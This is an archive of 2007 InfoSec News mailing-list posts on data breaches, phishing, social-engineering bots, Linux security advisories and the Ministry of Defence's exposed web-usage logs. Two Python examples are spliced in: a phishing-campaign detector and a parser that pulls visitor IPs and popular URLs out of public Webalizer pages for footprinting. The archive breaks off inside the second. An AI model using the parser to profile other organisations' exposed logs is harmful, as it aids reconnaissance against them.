After enough people suggesting it I've finally created a LinkedIn group for past Black Hat attendees. If you want to join this group please use the following link. If you are not already a member it will ask you to join. I want to help build communities around Black Hat, so if you have other ideas on how to do this please let me know!

http://www.linkedin.com/e/gis/37658/744A566F2D9D

We are working to launch the new Black Hat site this weekend, as well as release audio and video of several past conferences before the new year. Lots of changes are in the works!

Jeff Moss
Black Hat

[If you wish to be removed from future announcements such as this, just reply and I'll remove you]

From alerts at infosecnews.org Mon Dec 10 01:33:43 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Blood donors' personal data stolen along with laptop
Message-ID:

http://www.startribune.com/local/12190641.html

By David Phelps
Star Tribune
December 6, 2007

Personal information, including the Social Security numbers of more than a quarter-million Minnesota and Wisconsin donors to Memorial Blood Centers, is in the hands of a thief.

The organization revealed Wednesday that a laptop containing the names and addresses of 268,000 donors was stolen Nov. 28 as center employees set up a skyway-level blood drive in downtown Minneapolis on Seventh Street.
Letters went out Wednesday to the affected donors, who make up about half of Memorial's donor base, apologizing for any inconvenience and warning them to watch for unusual activity in their banking and charge accounts.

Blood centers chief executive Don Berglund said the organization believes it is highly unlikely that the person who stole the computer can gain access to the information inside because passwords and security devices had been installed.

"We've never had anything like this happen before," said Berglund, who called the incident a "random crime." The theft, which was reported immediately to Minneapolis police, was caught on a security camera.

Berglund said about half the laptop's records contain Social Security numbers. The records also include dates of birth and blood types. The data includes people who have donated since the center opened in 1948.

Minneapolis police have asked anyone with knowledge of the computer's whereabouts to call 612-692-TIPS (8477).

Not the only victims

The theft of the blood center's laptop is the latest in what has become a string of crimes in which clients' personal information was stolen from an institution, most commonly retailers or financial institutions. Often the thieves seem more interested in the hardware than the information on it, but identity theft has been traced to the crimes as well.

Sometimes the theft is highly sophisticated. Two years ago hackers outside a Marshall's department store in St. Paul used a telescope-shaped antenna to obtain credit card information going between cash registers and the store's computers. The theft ultimately was repeated across the country. Earlier this year Marshall's parent TJX Cos. revealed that information from at least 45.7 million credit and debit cards was stolen. The company recently agreed to pay up to $40.9 million to resolve claims by banks for money lost on Visa credit cards because of the security breach.
Fraud claims associated with other credit cards in the case are still pending.

The Memorial incident is similar to a case a year ago when a laptop containing the names and Social Security numbers of obstetrics patients of Allina Hospitals and Clinics was stolen from a nurse's car. That laptop was never recovered, but there was no indication that the person who took it was able to use the information.

"There never was any evidence the information was accessed," said Allina spokesman David Kanihan. "We sent letters [to patients], kept eyes on accounts and nothing ever happened."

Nearly two years ago, a laptop containing client information was stolen from a car belonging to an employee of Ameriprise Financial Inc. That laptop was recovered before any data was accessed.

'Unfortunate situation'

According to Berglund, Memorial employees who were setting up for the blood drive never saw the person who took the briefcase containing the laptop but realized right away that it had been stolen. The incident occurred at 6:43 a.m. Nov. 28, Berglund said. Memorial waited a week to send out warning letters to donors to allow police time to conduct an investigation, he said.

"We want to let you know about an unfortunate situation," the letter begins. It goes on to say, "We believe that the possibility that donor information on the stolen laptop could be used inappropriately is unlikely. Nonetheless, it is always advisable to review your financial records, bank statements, credit card statements and credit reports carefully and report suspicious transactions promptly."

Starting this week, Memorial will no longer ask for donors' Social Security numbers.

From alerts at infosecnews.org Mon Dec 10 01:33:58 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] China Link Suspected in Lab Hacking
Message-ID:

http://www.nytimes.com/2007/12/09/us/nationalspecial3/09hack.html

By JOHN MARKOFF
The New York Times
December 9, 2007

SAN FRANCISCO, Dec. 8 -- A cyber attack reported last week by one of the federal government's nuclear weapons laboratories may have originated in China, according to a confidential memorandum distributed Wednesday to public and private security officials by the Department of Homeland Security.

Security researchers said the memorandum, which was obtained by The New York Times from an executive at a private company, included a list of Web and Internet addresses that were linked to locations in China. However, they noted that such links did not prove that the Chinese government or Chinese citizens were involved in the attacks. In the past, intruders have compromised computers in China and then used them to disguise their true location.

Officials at the lab, Oak Ridge National Laboratory in Tennessee, said the attacks did not compromise classified information, though they acknowledged that they were still working to understand the full extent of the intrusion.

The Department of Homeland Security distributed the confidential warning to computer security officials on Wednesday after what it described as a set of "sophisticated attempts" to compromise computers used by the private sector and the government. Government computer security officials said the warning, which was issued by the United States Computer Emergency Readiness Team, known as US-CERT, was related to an October attack that was also disclosed last week by officials at the Oak Ridge laboratory.

According to a letter to employees written by the laboratory's director, Thom Mason, an unknown group of attackers sent targeted e-mail messages to roughly 1,100 employees as part of the ruse. "At this point, we have determined that the thieves made approximately 1,100 attempts to steal data with a very sophisticated strategy that involved sending staff a total of seven 'phishing' e-mails, all of which at first glance appeared legitimate," he wrote in an e-mail message sent to employees on Monday. "At present we believe that about 11 staff opened the attachments, which enabled the hackers to infiltrate the system and remove data."

In a statement posted on the laboratory's Web site, the agency stated: "The original e-mail and first potential corruption occurred on October 29, 2007. We have reason to believe that data was stolen from a database used for visitors to the Laboratory." The laboratory said the attackers were able to gain access to a database containing personal information about visitors to the laboratory going back to 1990.

The US-CERT advisory, which was not made public, stated: "The level of sophistication and the scope of these cyber security incidents indicate that they are coordinated and targeted at private sector systems." The US-CERT memo referred to the use of e-mail messages that fool employees into clicking on documents that then permit attackers to plant programs in their computers. These programs are then able to copy and forward specific data -- like passwords -- to remote locations.

Despite improvements in computer security, phishing attacks are still a big problem. In the case of the Oak Ridge intrusion, the e-mail messages were made to seem authentic. One described a scientific conference and another referred to a Federal Trade Commission complaint. Computer security researchers cautioned that despite the US-CERT description of the attacks as sophisticated, such threats are frequently undertaken by amateur computer hackers.

Classified federal computer networks are not supposed to be connected physically to the open Internet. Even so, sensitive data like employee e-mail databases can easily be compromised once access is gained to computers inside federal agencies.
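The pattern the lab describes, a handful of lures fanned out to roughly 1,100 mailboxes, is visible at the mail gateway before anyone opens an attachment: the same attachment lands in many distinct inboxes within a short period. The Python below is an added example, not code from the Times article, ORNL or US-CERT. The gateway log format, the hostnames, the hashes, the threshold and the window are all assumptions, and the sample log is constructed to mirror the two lures the article mentions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed mail-gateway log for this example (not ORNL data). One delivery
# per line, in an assumed format:
#   <ISO timestamp> from=<sender> to=<recipient> subject="<subject>" attach=<file> sha256=<hash>
SAMPLE_LOG = """\
2007-10-29T08:02:11 from=programme@conf-example.test to=alice@lab.test subject="Conference programme" attach=programme.doc sha256=3f1a9c0e
2007-10-29T08:02:13 from=programme@conf-example.test to=bob@lab.test subject="Conference programme" attach=programme.doc sha256=3f1a9c0e
2007-10-29T08:02:14 from=programme@conf-example.test to=carol@lab.test subject="Conference programme" attach=programme.doc sha256=3f1a9c0e
2007-10-29T08:02:16 from=programme@conf-example.test to=dave@lab.test subject="Conference programme" attach=programme.doc sha256=3f1a9c0e
2007-10-29T08:02:17 from=programme@conf-example.test to=erin@lab.test subject="Conference programme" attach=programme.doc sha256=3f1a9c0e
2007-10-29T08:02:19 from=programme@conf-example.test to=frank@lab.test subject="Conference programme" attach=programme.doc sha256=3f1a9c0e
2007-10-29T08:02:20 from=programme@conf-example.test to=grace@lab.test subject="Conference programme" attach=programme.doc sha256=3f1a9c0e
2007-10-29T09:15:40 from=complaints@ftc-example.test to=alice@lab.test subject="FTC complaint" attach=complaint.doc sha256=77be10d2
2007-10-29T09:15:41 from=complaints@ftc-example.test to=heidi@lab.test subject="FTC complaint" attach=complaint.doc sha256=77be10d2
2007-10-29T09:15:42 from=complaints@ftc-example.test to=ivan@lab.test subject="FTC complaint" attach=complaint.doc sha256=77be10d2
2007-10-29T09:15:44 from=complaints@ftc-example.test to=judy@lab.test subject="FTC complaint" attach=complaint.doc sha256=77be10d2
2007-10-29T09:15:45 from=complaints@ftc-example.test to=kim@lab.test subject="FTC complaint" attach=complaint.doc sha256=77be10d2
2007-10-29T09:15:47 from=complaints@ftc-example.test to=alice@lab.test subject="FTC complaint" attach=complaint.doc sha256=77be10d2
2007-10-29T10:00:00 from=hr@lab.test to=alice@lab.test subject="Benefits enrolment" attach=benefits.pdf sha256=aa00bb11
2007-10-29T10:00:01 from=hr@lab.test to=bob@lab.test subject="Benefits enrolment" attach=benefits.pdf sha256=aa00bb11
2007-10-31T12:00:00 from=programme@conf-example.test to=mallory@lab.test subject="Conference programme" attach=programme.doc sha256=3f1a9c0e
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) from=(?P<from>\S+) to=(?P<to>\S+) '
    r'subject="(?P<subject>[^"]*)" attach=(?P<attach>\S+) sha256=(?P<sha256>[0-9a-f]+)$'
)


def parse_log(text):
    """Turn gateway lines into event dicts; lines not in the expected format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        event = m.groupdict()
        event["ts"] = datetime.fromisoformat(event["ts"])
        events.append(event)
    return events


def find_campaigns(events, min_recipients=5, window=timedelta(hours=24)):
    """Flag every attachment hash delivered to at least `min_recipients` distinct
    recipients inside some `window`-long period.  Grouping is by the attachment
    hash rather than by subject or sender, which an attacker varies for free."""
    by_hash = defaultdict(list)
    for event in events:
        by_hash[event["sha256"]].append(event)

    campaigns = []
    for sha, evs in by_hash.items():
        evs.sort(key=lambda e: e["ts"])
        in_window = Counter()        # recipient -> deliveries inside the sliding window
        start, best = 0, None
        for end, event in enumerate(evs):
            in_window[event["to"]] += 1
            while event["ts"] - evs[start]["ts"] > window:   # drop deliveries that fell out
                old = evs[start]["to"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) >= min_recipients and (best is None or len(in_window) > best["recipients"]):
                seen = evs[start:end + 1]
                best = {
                    "sha256": sha,
                    "recipients": len(in_window),
                    "senders": sorted({e["from"] for e in seen}),
                    "subjects": sorted({e["subject"] for e in seen}),
                    "attachments": sorted({e["attach"] for e in seen}),
                    "first_seen": evs[start]["ts"].isoformat(),
                    "last_seen": event["ts"].isoformat(),
                }
        if best is not None:
            campaigns.append(best)
    return sorted(campaigns, key=lambda c: -c["recipients"])


if __name__ == "__main__":
    for c in find_campaigns(parse_log(SAMPLE_LOG)):
        print(f'{c["sha256"]}: {c["recipients"]} recipients, {c["senders"]}, {c["subjects"]}')
```

On the constructed log this reports the "Conference programme" attachment (seven distinct recipients inside the window; the straggler two days later does not extend it) and the "FTC complaint" attachment (five distinct recipients, one of them twice), and ignores the two-recipient HR mailing. Legitimate all-staff mailings will trip the same rule, so the output is a triage queue for the mail team and a reason to quarantine the attachment, not an automatic block; the threshold and window have to be tuned to the site's own fan-out.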
From alerts at infosecnews.org Tue Dec 11 01:01:27 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Warning sounded over 'flirting robots'
Message-ID:

Forwarded from: Dude VanWinkle

Didn't see this here, and thought it should be mentioned

http://www.news.com/8301-13860_3-9831133-56.html

By Ina Fried
December 7, 2007

Those entering online dating forums risk having more than their hearts stolen.

A program that can mimic online flirtation and then extract personal information from its unsuspecting conversation partners is making the rounds in Russian chat forums, according to security software firm PC Tools.

The artificial intelligence of CyberLover's automated chats is good enough that victims have a tough time distinguishing the "bot" from a real potential suitor, PC Tools said. The software can work quickly too, establishing up to 10 relationships in 30 minutes, PC Tools said. It compiles a report on every person it meets, complete with name, contact information, and photos.

"As a tool that can be used by hackers to conduct identity fraud, CyberLover demonstrates an unprecedented level of social engineering," PC Tools senior malware analyst Sergei Shevchenko said in a statement.

Among CyberLover's creepy features is its ability to offer a range of different profiles from "romantic lover" to "sexual predator." It can also lead victims to a "personal" Web site, which could be used to deliver malware, PC Tools said.

Although the program is currently targeting Russian Web sites, PC Tools is urging people in chat rooms and social networks elsewhere to be on the alert for such attacks. Their recommendations amount to just good sense in general, such as avoiding giving out personal information and using an alias when chatting online.

The software company believes that CyberLover's creators plan to make it available worldwide in February.

Robot chatters are just one type of social-engineering attack that uses trickery rather than a software flaw to access victims' valuable information. Such attacks have been on the rise and are predicted to continue to grow.

Update 4:10 p.m. PST: Mike Greene, vice president of product strategy at PC Tools, said that the company learned of CyberLover's existence earlier this week as part of its regular monitoring of IRC chat rooms and other places where talk about malware takes place. Greene said that it is hard to tell how prevalent use of the program is in Russia. "We don't have exact statistics, but I think it's early on," he said.

Greene said that the perceived anonymity of the Internet has desensitized people to the fact that information disclosed in an online chat can cause real-world damage. "People are used to not opening attachments or maybe not clicking on a link that shows up in their IM," he said. "But this emulates a real conversation, so you are more likely to give over personal information, click on a link or send your photograph."

From alerts at infosecnews.org Tue Dec 11 01:01:45 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Hackers dupe professor's friend
Message-ID:

http://www.telegraphindia.com/1071211/asp/calcutta/story_8652563.asp

By A STAFF REPORTER
December 11, 2007

Hackers in Nigeria got into the email account of a Calcutta-based professor and duped one of his friends of more than a lakh.

The hackers wrote from the email address of Ratan Khasnabish, who teaches in Calcutta University's business management department, to a businessman friend, saying he had run out of cash in Nigeria and immediately needed money to clear his hotel dues. The recipient (name withheld on request) sent the amount through an electronic money transfer system.
The mail that the friend received on December 7 read: "I am in Nigeria to participate in a conference and have lost my passport, credit card and handbag containing dollars while travelling in a taxi. The management of the hotel where I checked in is asking me to clear the dues immediately. Otherwise, they will throw me out. Please send me $2,500 immediately."

The friend did not suspect any foul play, as he knew Khasnabish travels a lot. "I sent the money on December 8 to George Pen, who the mail said was one of the agents of the hotel," said the friend.

But he became suspicious on receiving a second mail from Khasnabish's email address. This time, the hackers asked for $1,800 to pay the air fare from Nigeria to Calcutta. "I sent a reply in Bengali, written in Roman script, asking the sender to write back to me in the same style. But there was no response. I then called Khasnabish on his cellphone and learnt that he was in Calcutta, not Nigeria," recalled the friend.

Khasnabish, who has lodged a complaint with the state home department and the CID, said the hackers had sent a similar mail to another friend who lives in Ahmedabad. "But he called me as soon as he received it."

Rajeev Kumar, the special inspector-general (operations) of CID, said: "The victim should have called up Khasnabish before sending the money." Earlier, a number of people were duped on being told that they had won several lakhs in a lottery and would have to pay a clearance charge to receive the money.

From alerts at infosecnews.org Tue Dec 11 01:02:09 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Linux Advisory Watch: December 7th, 2007
Message-ID:

+------------------------------------------------------------------------+
|  LinuxSecurity.com                            Weekly Newsletter        |
|  December 7th, 2007                           Volume 8, Number 50      |
|                                                                        |
|  Editorial Team:  Dave Wreski                                          |
|                   Benjamin D. Thomas                                   |
+------------------------------------------------------------------------+

Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines.

This week, advisories were released for sitebar, e2fsprogs, wesnoth, zabbix, asterisk, heimdal, liblcms, openssh, openssl, vixie-cron, apache, openoffice, cairo, samba, mono, perl, and php. The distributors include Debian, Mandriva, Red Hat, SuSE, Slackware, and Ubuntu.

---

>> Linux+DVD Magazine <<

Our magazine is read by professional network and database administrators, system programmers, webmasters and all those who believe in the power of Open Source software. The majority of our readers are between 15 and 40 years old. They are interested in current news from the Linux world, upcoming projects etc. In each issue you can find information concerning typical use of Linux: safety, databases, multimedia, scientific tools, entertainment, programming, e-mail, news and desktop environments.

http://www.linuxsecurity.com/ads/adclick.php?bannerid=26

---

Knock, Knock, Knockin' on EnGarde's Door (with FWKNOP)
------------------------------------------------------

Secret knocks have been used for purposes as simple and childish as identifying friend or foe during a schoolyard fort war. Fraternities teach these knocks as a rite of passage into their society, and in our security world we can implement this layer of security to lock down an SSH server. With this guide on FWKNOP by Eckie S. (one of our own), you are taken through an easy-to-follow process of securing your platform with your own client and server port knocking set-up: installation, iptables rules setup, configuring access for the client and server, and everything in between. Check it out!

http://www.linuxsecurity.com/content/view/131846

---

Master's Student: Social Engineering is not just a definition!
--------------------------------------------------------------

We are happy to announce a new addition to the Linux Security Contributing Team: Gian G. Spicuzza. Currently a Graduate Student pursuing a Master's Degree in Computer Security (MSIA), Gian is a certified Linux/Unix administrator, the lead developer for the OSCAR-Backup System (at Sourceforge.com) and has experience in a variety of CSO, Management and consulting positions.

His first topic is a quick foray into the world and psychology of Social Engineering: All the security in the world isn't going to stop one of your employees or coworkers from giving up information. Just how easy is it? Craig never worked for Linda's company, nor did he call from IT. Craig was an unethical hacker who just gained unauthorized access to her account. Why? Because a phone call is simple. Read on to see just how easily businesses can be exploited.

http://www.linuxsecurity.com/content/view/131036

--> Take advantage of the LinuxSecurity.com Quick Reference Card! <--
--> http://www.linuxsecurity.com/docs/QuickRefCard.pdf <--

--------------------------------------------------------------------------

* EnGarde Secure Community v3.0.18 Now Available! (Dec 4)
-------------------------------------------------------

Guardian Digital is happy to announce the release of EnGarde Secure Community 3.0.18 (Version 3.0, Release 18). This release includes the brand new Health Center, new packages for FWKNOP and PSAD, updated packages and bug fixes, some feature enhancements to Guardian Digital WebTool and the SELinux policy, as well as other new features. In distribution since 2001, EnGarde Secure Community was one of the very first security platforms developed entirely from open source, and has been engineered from the ground up to provide users and organizations with complete, secure Web functionality, DNS, database and e-mail security, integrated intrusion detection and SELinux policies and more.
http://www.linuxsecurity.com/content/view/131851

--------------------------------------------------------------------------

* Debian: New sitebar packages fix several vulnerabilities (Dec 7)
----------------------------------------------------------------

A directory traversal vulnerability in the translation module allows remote authenticated users to chmod arbitrary files to 0777 via ".." sequences in the lang parameter.

http://www.linuxsecurity.com/content/view/132012

* Debian: New e2fsprogs packages fix arbitrary code execution (Dec 7)
-------------------------------------------------------------------

Rafal Wojtczuk of McAfee AVERT Research discovered that e2fsprogs, the ext2 file system utilities and libraries, contained multiple integer overflows in memory allocations, based on sizes taken directly from filesystem information. These could result in heap-based overflows, potentially allowing the execution of arbitrary code.

http://www.linuxsecurity.com/content/view/131871

* Debian: New wesnoth packages fix arbitrary file disclosure (Dec 6)
------------------------------------------------------------------

A vulnerability has been discovered in Battle for Wesnoth that allows remote attackers to read arbitrary files that the user running the game client has access to on the client machine.

http://www.linuxsecurity.com/content/view/131866

* Debian: New zabbix packages fix privilege escalation (Dec 5)
------------------------------------------------------------

Bas van Schaik discovered that the agentd process of Zabbix, a network monitoring system, may run user-supplied commands with group id root instead of zabbix, which may lead to a privilege escalation.

http://www.linuxsecurity.com/content/view/131865

* Debian: New OpenOffice.org packages fix arbitrary Java code execution (Dec 5)
-----------------------------------------------------------------------------

A vulnerability has been discovered in HSQLDB, the default database engine shipped with OpenOffice.org. This could result in the execution of arbitrary Java code embedded in an OpenOffice.org database document with the user's privileges. This update requires an update of both openoffice.org and hsqldb.

http://www.linuxsecurity.com/content/view/131864

* Debian: New asterisk packages fix SQL injection (Dec 2)
-------------------------------------------------------

Tilghman Lesher discovered that the logging engine of Asterisk, a free software PBX and telephony toolkit, performs insufficient sanitising of call-related data, which may lead to SQL injection.

http://www.linuxsecurity.com/content/view/131725

--------------------------------------------------------------------------

* Mandriva: Updated heimdal packages fix potential (Dec 6)
--------------------------------------------------------

It was found that the gss_userok() function in Heimdal 0.7.2 did not allocate memory for the ticketfile pointer before calling free(), which could possibly allow remote attackers to have an unknown impact via an invalid username. It is uncertain whether or not this is exploitable; however, packages are being provided regardless. The updated packages have been patched to correct these issues.

http://www.linuxsecurity.com/content/view/131870

* Mandriva: Updated liblcms package fixes buffer overflow (Dec 6)
---------------------------------------------------------------

A stack-based buffer overflow in Little CMS (lcms) before 1.15 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted ICC profile in a JPG file. The updated package fixes this issue.
http://www.linuxsecurity.com/content/view/131869

* Mandriva: Updated openssh packages fix X11 cookie (Dec 4)
---------------------------------------------------------

A flaw in OpenSSH prior to 4.7 prevented ssh from properly handling the case in which an untrusted cookie could not be created; it used a trusted X11 cookie instead, which could allow attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted. The updated packages have been patched to correct this issue.

http://www.linuxsecurity.com/content/view/131858

* Mandriva: Updated openssl packages fix DTLS vulnerability (Dec 4)
-----------------------------------------------------------------

A buffer overflow in the DTLS implementation of OpenSSL 0.9.8 could be exploited by attackers to potentially execute arbitrary code. It is questionable whether the DTLS support even worked or is used in any applications; as a result this flaw most likely does not affect most Mandriva users. The updated packages have been patched to correct this issue.

http://www.linuxsecurity.com/content/view/131859

* Mandriva: Updated vixie-cron packages fix DoS vulnerability (Dec 3)
-------------------------------------------------------------------

Raphael Marichez discovered a denial of service bug in how vixie-cron verifies crontab file integrity. A local user with the ability to create a hardlink to /etc/crontab could prevent vixie-cron from executing certain system cron jobs. The updated packages have been patched to correct this issue.

http://www.linuxsecurity.com/content/view/131847

* Mandriva: Updated apache packages fix vulnerabilities (Dec 3)
-------------------------------------------------------------

A flaw in the Apache mod_proxy module was found that could potentially lead to a denial of service when using a threaded Multi-Processing Module. On sites where a reverse proxy is configured, a remote attacker could send a special request that would cause the Apache child process handling the request to crash. Likewise, a similar crash could occur on sites with a forward proxy configured if a user could be persuaded to visit a malicious site using the proxy (CVE-2007-3847).

http://www.linuxsecurity.com/content/view/131848

--------------------------------------------------------------------------

* RedHat: Moderate: openoffice.org, hsqldb security update (Dec 5)
----------------------------------------------------------------

Updated openoffice.org and hsqldb packages that fix security flaws are now available for Red Hat Enterprise Linux 5. It was discovered that HSQLDB could allow the execution of arbitrary public static Java methods. A carefully crafted odb file opened in OpenOffice.org Base could execute arbitrary commands with the permissions of the user running OpenOffice.org. This update has been rated as having moderate security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/131861

* RedHat: Moderate: openoffice.org2 security update (Dec 5)
---------------------------------------------------------

Updated openoffice.org2 packages that fix a security issue are now available for Red Hat Enterprise Linux 4. It was discovered that HSQLDB could allow the execution of arbitrary public static Java methods. A carefully crafted odb file opened in OpenOffice.org Base could execute arbitrary commands with the permissions of the user running OpenOffice.org. This update has been rated as having moderate security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/131862

--------------------------------------------------------------------------

* Slackware: cairo (Dec 4)
--------------------------

New cairo packages are available for Slackware 11.0, 12.0, and -current to fix security issues.
More details about this issue may be found in the Common Vulnerabilities and Exposures (CVE) database:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5503

http://www.linuxsecurity.com/content/view/131850

--------------------------------------------------------------------------

* SuSE: samba (SUSE-SA:2007:065) (Dec 5)
--------------------------------------

Secunia Research has reported a bug in the function reply_netbios_packet() that allowed remote attackers to execute arbitrary code by sending specially crafted WINS "Name Registration" requests followed by a WINS "Name Query" request packet. The exploitable code in samba can only be reached if the option "wins support" is enabled.

http://www.linuxsecurity.com/content/view/131863

--------------------------------------------------------------------------

* Ubuntu: Mono vulnerability (Dec 4)
-----------------------------------

It was discovered that Mono did not correctly bounds check certain BigInteger operations. Remote attackers could exploit this to crash a Mono application or possibly execute arbitrary code with user privileges.

http://www.linuxsecurity.com/content/view/131854

* Ubuntu: Perl vulnerability (Dec 4)
-----------------------------------

It was discovered that Perl's regular expression library did not correctly handle certain UTF sequences. If a user or automated system were tricked into running a specially crafted regular expression, a remote attacker could crash the application or possibly execute arbitrary code with user privileges.

http://www.linuxsecurity.com/content/view/131855

* Ubuntu: Firefox regression (Dec 4)
-----------------------------------

Gregory Fleischer discovered that it was possible to use JavaScript to manipulate Firefox's Referer header. A malicious web site could exploit this to conduct cross-site request forgeries against sites that relied only on Referer headers for protection from such attacks. (CVE-2007-5960)

http://www.linuxsecurity.com/content/view/131853

* Ubuntu: PHP regression (Dec 3)
-------------------------------

It was discovered that the wordwrap function did not correctly check lengths. Remote attackers could exploit this to cause a crash or monopolize CPU resources, resulting in a denial of service. (CVE-2007-3998)

http://www.linuxsecurity.com/content/view/131849

* Ubuntu: Cairo vulnerability (Dec 3)
------------------------------------

Peter Valchev discovered that Cairo did not correctly decode PNG image data. By tricking a user or automated system into processing a specially crafted PNG with Cairo, a remote attacker could execute arbitrary code with user privileges.

http://www.linuxsecurity.com/content/view/131845

------------------------------------------------------------------------
Distributed by: Guardian Digital, Inc.                LinuxSecurity.com

To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message.
------------------------------------------------------------------------

From alerts at infosecnews.org Tue Dec 11 01:02:22 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Ministry of Defence leaks counter terrorism traffic
Message-ID:

http://www.theregister.co.uk/2007/12/10/mod_usage_statistics/

By Dan Goodin in San Francisco
The Register
10th December 2007

For the past 20 months, the Ministry of Defence has been generous enough to provide detailed information about visits to its Counter Terrorism Science & Technology [1] site. We're not sure, exactly, what to make of the logs showing some of the site's most popular pages and most prolific visitors. On the one hand, such details aren't exactly state secrets. Then again, what possible benefit can come from volunteering statistics that show that the Bulgarian IP address 85.187.138.185 was the top visitor for the month of March, having accessed 668 files for a total of 3.5 MB worth of data?
Until late last week, usage stats as measured by an analysis program called Webalizer were freely available from April 2006 through this month. We're guessing the disclosure was not intentional, because the information was quickly removed, about a day after MOD admins were informed of the public pages. (The information is still available in search engine caches by using search strings such as http://www.ctcentre.mod.uk/usage/usage_200604.html, http://www.ctcentre.mod.uk/usage/usage_200605.html and so on.)

Besides showing top visitors, the pages list some of the site's most popular URLs for each month. Last month, for instance, the Counter Terrorism site had just north of 15,000 page impressions, and its fourth most popular URL was this one relating to potential suppliers.

To be sure, disclosures such as these aren't likely to lead to the kinds of security nightmares that result when, say, a consultant "loses" a laptop containing personal information belonging to hundreds of thousands of individuals. At the same time, seemingly innocuous information like this can be precisely the kind of fodder gathered in footprinting exercises, in which attackers learn as much as possible about sites they intend to penetrate. Loose lips sink ships, as the saying goes.

"I think I can reasonably say that any conventional enterprise or government entity most likely intends to have policies in place that would consider IP addresses of visitors to be information not intended to be casually shared on the public internet," says security researcher Rodney Thayer of Canola & Jones.

The MOD is by no means the only website that has made its Webalizer logs available to the world. Running this search reveals tens, possibly thousands, of sites that allow anyone to view usage statistics. NASA, the US Army and a UK hospital are among them.
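What a footprinting attacker actually pulls out of one of these pages, and how to recognise one of your own reports that has gone public, is easier to see on a concrete page. The Python below is an added example, not anything from The Register or the MOD: it parses a Webalizer-style monthly report, identifies it by its generator tag or stock title, and extracts the visitor hosts, the most active visitor and the most requested URLs. The HTML is constructed for the example and only loosely follows Webalizer's table layout (real reports carry more columns); apart from the address quoted in the article, the hosts and figures are made up.

```python
import re
from html.parser import HTMLParser

# Constructed usage page for this example.  It is not the MOD's report and only
# loosely follows Webalizer's monthly-report layout (real reports carry more
# columns); the addresses other than the one quoted in the article are made up.
SAMPLE_PAGE = """\
<HTML><HEAD><TITLE>Usage Statistics for www.example.test - March 2007</TITLE>
<META NAME="generator" CONTENT="Webalizer 2.01"></HEAD><BODY>
<TABLE>
<TR><TH COLSPAN=5>Top 30 of 1811 Total Sites</TH></TR>
<TR><TH>#</TH><TH>Hits</TH><TH>Files</TH><TH>KBytes</TH><TH>Hostname</TH></TR>
<TR><TD>1</TD><TD>712</TD><TD>668</TD><TD>3584</TD><TD>85.187.138.185</TD></TR>
<TR><TD>2</TD><TD>401</TD><TD>388</TD><TD>2011</TD><TD>198.51.100.23</TD></TR>
<TR><TD>3</TD><TD>97</TD><TD>90</TD><TD>455</TD><TD>crawler.example.net</TD></TR>
</TABLE>
<TABLE>
<TR><TH COLSPAN=4>Top 20 of 311 Total URLs</TH></TR>
<TR><TH>#</TH><TH>Hits</TH><TH>KBytes</TH><TH>URL</TH></TR>
<TR><TD>1</TD><TD>5020</TD><TD>12000</TD><TD>/</TD></TR>
<TR><TD>2</TD><TD>1300</TD><TD>9800</TD><TD>/suppliers/index.php</TD></TR>
</TABLE>
</BODY></HTML>
"""

TOP_RE = re.compile(r"Top \d+ of (\d+) Total (\w+)")


class _TableParser(HTMLParser):
    """Collect the page title, the generator meta tag and every table as rows of cell text."""

    def __init__(self):
        super().__init__()
        self.tables, self.title, self.generator = [], "", ""
        self._row = self._cell = None
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "table":
            self.tables.append([])
        elif tag == "tr":
            self._row = []
        elif tag in ("td", "th"):
            self._cell = []
        elif tag == "title":
            self._in_title = True
        elif tag == "meta" and attrs.get("name", "").lower() == "generator":
            self.generator = attrs.get("content", "")

    def handle_endtag(self, tag):
        if tag in ("td", "th") and self._cell is not None and self._row is not None:
            self._row.append(" ".join("".join(self._cell).split()))
            self._cell = None
        elif tag == "tr" and self._row is not None and self.tables:
            self.tables[-1].append(self._row)
            self._row = None
        elif tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._cell is not None:
            self._cell.append(data)
        elif self._in_title:
            self.title += data


def _parse(html):
    p = _TableParser()
    p.feed(html)
    p.close()
    return p


def is_webalizer_report(html):
    """Recognise a Webalizer page by its generator tag or its stock title."""
    p = _parse(html)
    return "webalizer" in p.generator.lower() or p.title.strip().startswith("Usage Statistics for")


def top_tables(html):
    """Return {"Sites": (total, rows), "URLs": (total, rows), ...} for every
    "Top N of M Total X" table, rows as dicts keyed by the column headers."""
    out = {}
    for table in _parse(html).tables:
        if len(table) < 2 or not table[0]:
            continue
        m = TOP_RE.search(table[0][0])
        if not m:
            continue
        header = table[1]
        rows = [dict(zip(header, r)) for r in table[2:] if len(r) == len(header)]
        out[m.group(2)] = (int(m.group(1)), rows)
    return out


def footprint_summary(html):
    """What a footprinting attacker takes from the page: who watches the site
    hardest, how many distinct hosts visit, and which URLs matter."""
    p = _parse(html)
    tables = top_tables(html)
    sites_total, sites = tables.get("Sites", (0, []))
    _urls_total, urls = tables.get("URLs", (0, []))
    top = max(sites, key=lambda r: int(r["Files"]), default=None)
    return {
        "report_for": p.title.strip(),
        "generator": p.generator,
        "distinct_visitor_hosts": sites_total,
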